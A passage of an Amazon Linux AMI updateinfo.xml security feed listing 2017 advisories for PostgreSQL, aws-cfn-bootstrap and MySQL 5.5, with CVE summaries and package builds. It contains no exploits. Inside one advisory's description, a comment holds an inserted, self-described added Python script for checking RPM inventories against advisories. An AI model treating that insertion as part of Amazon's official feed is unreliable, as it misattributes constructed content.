</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546" title="" id="CVE-2017-7546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7547" title="" id="CVE-2017-7547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-plpython26" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.18" release="1.64.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql93-server-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.18" release="1.64.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" 
version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.22" release="1.61.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql92-contrib-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.22-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-885</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-885: medium priority package update for 
postgresql94 postgresql95</title><issued date="2017-08-31 16:22:00" /><updated date="2017-08-31 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7548:
An authorization flaw was found in the way PostgreSQL handled large objects. A remote authenticated attacker with no privileges on a large object could potentially use this flaw to overwrite the entire content of the object, thus resulting in denial of service.
1477187:
CVE-2017-7548 postgresql: lo_put() function ignores ACLs
CVE-2017-7547:
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
1477185:
CVE-2017-7547 postgresql: pg_user_mappings view discloses passwords to users lacking server privileges
CVE-2017-7546:
It was found that authenticating to a PostgreSQL database account with an empty password was possible despite libpq&#039;s refusal to send an empty password. A remote attacker could potentially use this flaw to gain access to database accounts with empty passwords.
1477184:
CVE-2017-7546 postgresql: Empty password accepted in some authentication methods
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546" title="" id="CVE-2017-7546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7547" title="" id="CVE-2017-7547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7548" title="" id="CVE-2017-7548" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" 
version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.13-1.69.amzn1.i686.rpm</filename></package><package 
name="postgresql94-test" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package 
name="postgresql95-plpython27" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.8" release="1.73.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql95-devel-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.8-1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-886</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-886: important priority package update for aws-cfn-bootstrap</title><issued date="2017-08-31 17:03:00" /><updated date="2024-02-10 00:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9450:
The Amazon Web Services (AWS) CloudFormation bootstrap tools package (aka aws-cfn-bootstrap) before 1.4-19.10 allows local users to execute arbitrary code with root privileges by leveraging the ability to create files in an unspecified directory.
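<!--
The advisory above is one update element in the updateinfo.xml layout this whole file uses: an id, a severity, CVE references and the exact build (epoch, version, release, arch) that closes the issue. As an added example, not code from Amazon Linux or from the aws-cfn-bootstrap project, the Python script below consumes that layout offline: it parses the security updates and compares an inventory of installed packages against each advisory's shipped build with a port of rpm's rpmvercmp (epoch is compared numerically first; the '^' post-release marker is not handled). The embedded XML is a trimmed copy of the ALAS-2017-886 entry, and the inventory is constructed. The check keys on the package the advisory ships (1.4-21.13.amzn1), not on the upstream threshold quoted in the CVE text (1.4-19.10), because the Amazon build is what a host can actually install.

```python
"""Check an RPM inventory against Amazon Linux updateinfo.xml security advisories."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed copy of the ALAS-2017-886 entry from this file
# (dates and description dropped). The real file holds thousands of <update> elements.
SAMPLE_UPDATEINFO = """<updates>
<update status="final" version="1.4" type="security" from="linux-security@amazon.com">
<id>ALAS-2017-886</id>
<title>Amazon Linux AMI 2014.03 - ALAS-2017-886: important priority package update for aws-cfn-bootstrap</title>
<severity>important</severity>
<references>
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9450" title="" id="CVE-2017-9450" type="cve" />
</references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="aws-cfn-bootstrap" version="1.4" release="21.13.amzn1" epoch="0" arch="noarch">
<filename>Packages/aws-cfn-bootstrap-1.4-21.13.amzn1.noarch.rpm</filename></package>
</collection></pkglist>
</update>
</updates>"""

_DIGITS = re.compile(r"[0-9]+")
_ALPHA = re.compile(r"[A-Za-z]+")


def rpmvercmp(a, b):
    """Port of rpm's rpmvercmp(): 1 if a is newer, -1 if older, 0 if equal.
    Segments are runs of digits or letters; separators are ignored; '~' sorts
    before anything (pre-releases). The '^' post-release marker is not handled."""
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not (a[i].isalnum() or a[i] == "~"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        a_tilde = i < len(a) and a[i] == "~"
        b_tilde = j < len(b) and b[j] == "~"
        if a_tilde or b_tilde:
            if not a_tilde:
                return 1
            if not b_tilde:
                return -1
            i += 1
            j += 1
            continue
        if i >= len(a) or j >= len(b):
            break
        isnum = a[i].isdigit()
        pat = _DIGITS if isnum else _ALPHA
        ma, mb = pat.match(a, i), pat.match(b, j)
        if mb is None:          # mixed types: a numeric segment is newer than an alpha one
            return 1 if isnum else -1
        sa, sb = ma.group(0), mb.group(0)
        i, j = ma.end(), mb.end()
        if isnum:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def evr_cmp(a, b):
    """Compare (epoch, version, release) triples: epoch first, then version, then release."""
    if int(a[0]) != int(b[0]):
        return 1 if int(a[0]) > int(b[0]) else -1
    return rpmvercmp(a[1], b[1]) or rpmvercmp(a[2], b[2])


def parse_updateinfo(xml_text):
    """Yield (advisory id, severity, [CVE ids], [(name, arch, (epoch, version, release))])
    for every <update type="security"> element."""
    for upd in ET.fromstring(xml_text).iter("update"):
        if upd.get("type") != "security":
            continue
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        pkgs = [(p.get("name"), p.get("arch"),
                 (p.get("epoch", "0"), p.get("version"), p.get("release")))
                for p in upd.iter("package")]
        yield upd.findtext("id"), upd.findtext("severity"), cves, pkgs


def missing_advisories(xml_text, installed):
    """installed maps (name, arch) to (epoch, version, release), e.g. from rpm -qa
    with the query format '%{NAME} %{ARCH} %{EPOCHNUM} %{VERSION} %{RELEASE}'.
    Returns one finding per installed package that is older than the advisory's build."""
    findings = []
    for adv_id, severity, cves, pkgs in parse_updateinfo(xml_text):
        for name, arch, fixed in pkgs:
            have = installed.get((name, arch))
            if have is not None and evr_cmp(have, fixed) < 0:
                findings.append({"advisory": adv_id, "severity": severity, "cves": cves,
                                 "package": "%s.%s" % (name, arch),
                                 "installed": "%s:%s-%s" % have, "fixed": "%s:%s-%s" % fixed})
    return findings


if __name__ == "__main__":
    # Constructed inventory: a host still on the 19.10 build is below the advisory's 21.13 build.
    inventory = {("aws-cfn-bootstrap", "noarch"): ("0", "1.4", "19.10.amzn1")}
    for finding in missing_advisories(SAMPLE_UPDATEINFO, inventory):
        print(finding)
```

On a live host yum's updateinfo subcommand reads this same file directly; the script is for checking exported inventories (for example, package lists captured from an AMI build pipeline) without yum, and the arch key matters because a noarch package is reported as noarch by rpm, not as the host architecture.
-->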
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9450" title="" id="CVE-2017-9450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="21.13.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-21.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-887</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-887: medium priority package update for mysql55</title><issued date="2017-08-31 17:08:00" /><updated date="2017-08-31 23:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3653:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472711:
CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3652:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N).
1472710:
CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3651:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472708:
CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017)
CVE-2017-3648:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Charsets). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472704:
CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017)
CVE-2017-3641:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472693:
CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017)
CVE-2017-3636:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.56 and earlier and 5.6.36 and earlier. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).
1472686:
CVE-2017-3636 mysql: Client programs unspecified vulnerability (CPU Jul 2017)
CVE-2017-3635:
